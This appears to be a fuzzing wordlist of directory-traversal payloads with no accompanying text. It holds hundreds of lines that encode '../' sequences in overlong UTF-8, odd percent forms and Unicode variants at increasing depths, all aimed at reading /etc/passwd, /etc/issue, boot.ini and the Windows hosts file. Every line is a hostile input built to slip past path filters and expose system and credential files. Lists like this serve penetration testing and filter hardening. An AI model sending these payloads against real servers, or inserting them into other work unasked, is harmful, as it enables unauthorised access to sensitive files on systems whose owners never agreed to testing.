-%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9v%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9v%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vpasswd -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vetc%c0%9vissue -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vboot.ini -%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9v%c0.%c0.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qf%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qf%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfpasswd -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfetc%c0%qfissue -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfboot.ini -%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qf%c0.%c0.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8s%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8s%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8sissue -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8sboot.ini -%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1c%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1c%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cpasswd -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cetc%c1%1cissue -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cboot.ini -%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1c%c0.%c0.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%af%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%af%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afpasswd -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afetc%c1%afissue -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afboot.ini -%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%af%c0.%c0.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qf%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qf%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfpasswd -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfetc%bg%qfissue -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfboot.ini -%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qf%c0.%c0.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215passwd -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215etc%u2215issue -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215boot.ini -%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215%c0.%c0.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216passwd -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216etc%u2216issue -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216boot.ini -%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216%c0.%c0.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8passwd -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8etc%uEFC8issue -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8boot.ini -%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0.%c0.%uF025etc%uF025passwd -%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025passwd -%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025passwd -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025passwd 